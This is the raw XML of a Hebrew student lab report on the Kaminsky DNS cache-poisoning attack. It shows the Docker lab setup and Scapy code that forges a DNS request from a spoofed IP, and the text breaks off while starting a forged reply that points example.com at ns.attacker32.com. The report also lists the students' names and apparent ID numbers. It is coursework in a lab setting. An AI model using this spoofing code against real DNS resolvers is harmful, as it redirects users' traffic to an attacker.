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7628D" w14:textId="3FBA2963" w:rsidR="001140A3" w:rsidRDefault="00132E23" w:rsidP="00132E23">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132E23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Kaminsky Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BDBA59" w14:textId="77777777" w:rsidR="00132E23" w:rsidRDefault="00132E23" w:rsidP="00132E23">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132E23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>By :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED76B26" w14:textId="2FAA0225" w:rsidR="00132E23" w:rsidRDefault="00132E23" w:rsidP="004929AE">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Guy Shimon – 209306513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Oriel </w:t>
      </w:r>
      <w:r w:rsidRPr="00132E23">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Shapiro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132E23">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:t>314779745</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B4FB7" w14:textId="69B4C340" w:rsidR="004929AE" w:rsidRDefault="004929AE" w:rsidP="0082421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תחילה הרמנו את הדוקרים</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A7534" w14:textId="77777777" w:rsidR="00824212" w:rsidRDefault="00026B76" w:rsidP="00824212">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00026B76">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7882FA6E" wp14:editId="208A6645">
            <wp:extent cx="3598985" cy="1997077"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3175"/>
            <wp:docPr id="189452984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298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2984" cy="201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B878" w14:textId="77777777" w:rsidR="00903401" w:rsidRDefault="00824212" w:rsidP="0082421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ואז המשכנו בלפתוח עוד טרמינלים על מנת להתחבר לדוקרים </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00903401" w:rsidRPr="00903401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6932D7C9" wp14:editId="46B4312F">
            <wp:extent cx="5274310" cy="1249045"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="161366211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62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3776" w14:textId="3060F7FC" w:rsidR="00903401" w:rsidRDefault="00903401" w:rsidP="0090340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התחברנו באמצעות הפקודה :</w:t>
      </w:r>
      <w:r w:rsidRPr="00903401">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="00903401">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>docker exec -it</w:t>
      </w:r>
      <w:r w:rsidR="00863A1D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;ID&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00903401">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6034D9B2" w14:textId="5CCE5F84" w:rsidR="00132E23" w:rsidRDefault="004E237F" w:rsidP="00824212">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E237F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77565CF1" wp14:editId="0637B0B5">
            <wp:extent cx="5051425" cy="1500554"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="26167060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706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9506" cy="150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212"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שינינו את השמות על מנת להקל עלינו</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69734D47" w14:textId="411B2D97" w:rsidR="004E237F" w:rsidRDefault="00682F52" w:rsidP="00824212">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00682F52">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C4D20A7" wp14:editId="4FF8F780">
            <wp:extent cx="4937278" cy="1740437"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121094116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41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878" cy="174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7EBC" w14:textId="54F92D80" w:rsidR="00682F52" w:rsidRDefault="00682F52" w:rsidP="0082421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כפי שניתן לראות </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>attacker32.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מופנה אל הכתובת 10.9.0.153 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E976EB" w:rsidRPr="00E976EB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76536B14" wp14:editId="793FC776">
            <wp:extent cx="3299746" cy="1234547"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="89996418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641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D4BC" w14:textId="750854A4" w:rsidR="00E976EB" w:rsidRDefault="00E976EB" w:rsidP="0082421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בנוסף ניתן לראות כי היוזר מוגדר כי שרת ה</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שלו מוגדר להיות 10.9.0.53 שזה בעצם </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>local dns server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4011B256" w14:textId="04CCCF77" w:rsidR="00E976EB" w:rsidRDefault="00D95EEA" w:rsidP="00824212">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D95EEA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="403FC2D3" wp14:editId="1DA4639E">
            <wp:extent cx="3909646" cy="2651932"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="160077134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71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5" cy="266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48B5" w14:textId="18367BAD" w:rsidR="00D95EEA" w:rsidRDefault="00D95EEA" w:rsidP="0082421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פה בעצם ניתן לראות כי לתוקף את </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>attacker32.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הלגיטימי ואת ה </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>example.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> המזויף.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34713515" w14:textId="73A092C3" w:rsidR="00D95EEA" w:rsidRDefault="00D95EEA" w:rsidP="00824212">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D95EEA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="722B4510" wp14:editId="69DBDC0A">
            <wp:extent cx="3124200" cy="2286708"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="157630341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034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7465" cy="236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7A17" w14:textId="25736EB8" w:rsidR="00D95EEA" w:rsidRDefault="00D95EEA" w:rsidP="0082421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פה ניתן לראות כי הדומיין משויך אל התוקף</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298D9291" w14:textId="22BCE802" w:rsidR="00D95EEA" w:rsidRDefault="003C1263" w:rsidP="00824212">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1263">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="441D60DB" wp14:editId="34501A82">
            <wp:extent cx="3159369" cy="2104648"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="12167512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51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8006" cy="211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2C69" w14:textId="4D2C7564" w:rsidR="003C1263" w:rsidRDefault="003C1263" w:rsidP="0082421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נשים לב שאצל היוזר ה</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">example.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> משויכת לכתובת 93.184.215.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CACCDBD" w14:textId="33622C1C" w:rsidR="003C1263" w:rsidRDefault="005A559C" w:rsidP="00824212">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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D9E50" wp14:editId="5CCBE766">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4460240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1602789</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="539261" cy="199292"/>
                <wp:effectExtent l="0" t="0" r="13335" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="70537995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261" cy="1992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71AE8" id="מלבן 1" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:351.2pt;margin-top:126.2pt;width:42.45pt;height:1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oeufgIAAF4FAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r469tluCOkXQIsOA&#10;oi3aDj0rshQbkEWNUuJkXz9KdpygK3YY5oMsiuQj+UTq6nrXGrZV6BuwJc/PJpwpK6Fq7LrkP16W&#10;n75y5oOwlTBgVcn3yvPr+ccPV52bqQJqMJVCRiDWzzpX8joEN8syL2vVCn8GTllSasBWBBJxnVUo&#10;OkJvTVZMJpdZB1g5BKm8p9PbXsnnCV9rJcOD1l4FZkpOuYW0YlpXcc3mV2K2RuHqRg5piH/IohWN&#10;paAj1K0Igm2w+QOqbSSCBx3OJLQZaN1IlWqgavLJm2qea+FUqoXI8W6kyf8/WHm/fXaPSDR0zs88&#10;bWMVO41t/FN+bJfI2o9kqV1gkg4vPk+Ly5wzSap8Oi2mRSQzOzo79OGbgpbFTcmR7iJRJLZ3PvSm&#10;B5MYy8KyMSbdh7HxwINpqniWBFyvbgyyraCLXC4n9A3hTswoeHTNjqWkXdgbFTGMfVKaNRUlX6RM&#10;UpepEVZIqWzIe1UtKtVHyy9OgsW+jB6p0gQYkTVlOWIPAAfLHuSA3dc92EdXlZp0dJ78LbHeefRI&#10;kcGG0bltLOB7AIaqGiL39geSemoiSyuo9o/IEPoR8U4uG7q3O+HDo0CaCZoemvPwQIs20JUchh1n&#10;NeCv986jPbUqaTnraMZK7n9uBCrOzHdLTTzNz8/jUCbh/OJLQQKealanGrtpb4Bun3qOskvbaB/M&#10;4VQjtK/0HCxiVFIJKyl2yWXAg3AT+tmnB0WqxSKZ0SA6Ee7ss5MRPLIa+/Jl9yrQDc0bqOvv4TCP&#10;Yvamh3vb6GlhsQmgm9TgR14HvmmIU+MMD058JU7lZHV8Fue/AQAA//8DAFBLAwQUAAYACAAAACEA&#10;BIZK194AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPy07DQAxF90j8w8hI7OikKZAoZFIhRFcs&#10;oKUSWzdjkqjzUmbShr/HXcHOj+t7j+v1bI040RgH7xQsFxkIcq3Xg+sU7D83dyWImNBpNN6Rgh+K&#10;sG6ur2qstD+7LZ12qRNs4mKFCvqUQiVlbHuyGBc+kOPdtx8tJm7HTuoRz2xujcyz7FFaHBwn9Bjo&#10;paf2uJssYwTzEfT0ftx/LefN+KrfInaFUrc38/MTiERz+hPDBZ9voGGmg5+cjsIoKLL8nqUK8odL&#10;wYqiLFYgDjwpVyXIppb/f2h+AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALFWh65+AgAA&#10;XgUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAASGStfe&#10;AAAACwEAAA8AAAAAAAAAAAAAAAAA2AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADj&#10;BQAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005A559C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AC3F1F" wp14:editId="1BAE12A2">
            <wp:extent cx="2637692" cy="2587687"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="165382515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251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4398" cy="260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59C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A559C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="461B3DFE" wp14:editId="76358D02">
            <wp:extent cx="2567354" cy="1725725"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8255"/>
            <wp:docPr id="112151387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138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3151" cy="173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BA78" w14:textId="1AEC254F" w:rsidR="005A559C" w:rsidRDefault="009D6D6F" w:rsidP="0082421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ניתן לראות כי כאשר מסתגלים בתמונה השמאלית נשים לב שהכתובת </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מזויפת. מה שנרצה לראות כאשר נפעיל את ההתקפה ונריץ את הפקודה הימנית</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F37057" w14:textId="08E420DD" w:rsidR="009D6D6F" w:rsidRDefault="008F1FD7" w:rsidP="0082421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הכל תקין ואנחנו מוכנים להתקפה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE2EAEA" w14:textId="79CDCA01" w:rsidR="008F1FD7" w:rsidRDefault="000412CE" w:rsidP="000412CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000412CE">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4E4852" w14:textId="35A2B9DD" w:rsidR="000412CE" w:rsidRPr="000412CE" w:rsidRDefault="000412CE" w:rsidP="000412CE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הקוד המושלם:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28722D8A" w14:textId="77777777" w:rsidR="000412CE" w:rsidRPr="000412CE" w:rsidRDefault="000412CE" w:rsidP="000412CE">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000412CE">
        <w:t>Qdsec = DNSQR(qname=’www.example.com’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F206F74" w14:textId="77777777" w:rsidR="000412CE" w:rsidRPr="000412CE" w:rsidRDefault="000412CE" w:rsidP="000412CE">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000412CE">
        <w:t xml:space="preserve"> dns = DNS(id=0xAAAA, qr=0, qdcount=1, ancount=0, nscount=0, arcount=0, qd=Qdsec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE7E395" w14:textId="339DEF9F" w:rsidR="000412CE" w:rsidRPr="000412CE" w:rsidRDefault="000412CE" w:rsidP="000412CE">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000412CE">
        <w:t xml:space="preserve"> ip = IP(dst='10.9.0.53’, src='1.2.3.</w:t>
      </w:r>
      <w:r w:rsidR="00747EBB">
        <w:t>4'</w:t>
      </w:r>
      <w:r w:rsidRPr="000412CE">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5331BE7A" w14:textId="617FA381" w:rsidR="004B46B7" w:rsidRDefault="000412CE" w:rsidP="004D3BED">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000412CE">
        <w:t xml:space="preserve"> udp = UDP(dport=</w:t>
      </w:r>
      <w:r w:rsidR="004B46B7" w:rsidRPr="004B46B7">
        <w:t>53</w:t>
      </w:r>
      <w:r w:rsidRPr="000412CE">
        <w:t>, sport=</w:t>
      </w:r>
      <w:r w:rsidR="004D3BED" w:rsidRPr="004D3BED">
        <w:t>33333</w:t>
      </w:r>
      <w:r w:rsidRPr="000412CE">
        <w:t>, chksum=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D7960F" w14:textId="351A761B" w:rsidR="000412CE" w:rsidRDefault="000412CE" w:rsidP="004B46B7">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000412CE">
        <w:t xml:space="preserve"> request = ip/udp/dns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FF074" w14:textId="7E2581AA" w:rsidR="000412CE" w:rsidRDefault="000412CE" w:rsidP="000412CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הסברים:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67AA76" w14:textId="5B4D7D78" w:rsidR="000412CE" w:rsidRDefault="000412CE" w:rsidP="000412CE">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000412CE">
        <w:t>ip = IP(dst='10.9.0.53', src='1.2.3.</w:t>
      </w:r>
      <w:r w:rsidR="00747EBB">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="000412CE">
        <w:t>')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C2ECEF" w14:textId="782C9607" w:rsidR="000412CE" w:rsidRDefault="000412CE" w:rsidP="000412CE">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>dst-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>זה הכתובת שאנחנו רוצים לתקוף</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6252AB45" w14:textId="3F6472D6" w:rsidR="004B46B7" w:rsidRDefault="000412CE" w:rsidP="000412CE">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> זאת הכתובת שאנחנו רוצים לזייף שמתי 1234 סתם כי ראינו את זה למעלה</w:t>
      </w:r>
      <w:r w:rsidR="004B46B7">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B46B7">
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A777A" w14:textId="068ECED1" w:rsidR="004B46B7" w:rsidRDefault="004B46B7" w:rsidP="004D3BED">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B46B7">
        <w:t>udp = UDP(dport=53, sport=</w:t>
      </w:r>
      <w:r w:rsidR="004D3BED" w:rsidRPr="004D3BED">
        <w:t>33333</w:t>
      </w:r>
      <w:r w:rsidRPr="004B46B7">
        <w:t>, chksum=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BAD684" w14:textId="46CBE06B" w:rsidR="000412CE" w:rsidRDefault="004B46B7" w:rsidP="004B46B7">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dport-53DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">משום שזה הפורט </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792F0B94" w14:textId="0A9173E7" w:rsidR="004B46B7" w:rsidRDefault="004B46B7" w:rsidP="004B46B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sport- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>סתם פורט מונפץ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D38C32D" w14:textId="7D401FD9" w:rsidR="004B46B7" w:rsidRDefault="004B46B7" w:rsidP="004B46B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B46B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8874A6" w14:textId="72C89994" w:rsidR="004B46B7" w:rsidRPr="004B46B7" w:rsidRDefault="004B46B7" w:rsidP="004B46B7">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004B46B7">
        <w:t>Name='www.example.com'</w:t>
      </w:r>
      <w:r w:rsidRPr="004B46B7">
        <w:br/>
        <w:t>domain = 'example.com'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                              </w:t>
      </w:r>
      <w:r w:rsidRPr="004B46B7">
        <w:t xml:space="preserve"> ns = 'ns.attacker32.com’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                      </w:t>
      </w:r>
      <w:r w:rsidRPr="004B46B7">
        <w:t xml:space="preserve"> Qdsec = DNSQR(qname=name) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BA13AA" w14:textId="700A9B7D" w:rsidR="004B46B7" w:rsidRPr="004B46B7" w:rsidRDefault="004B46B7" w:rsidP="004B46B7">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004B46B7">
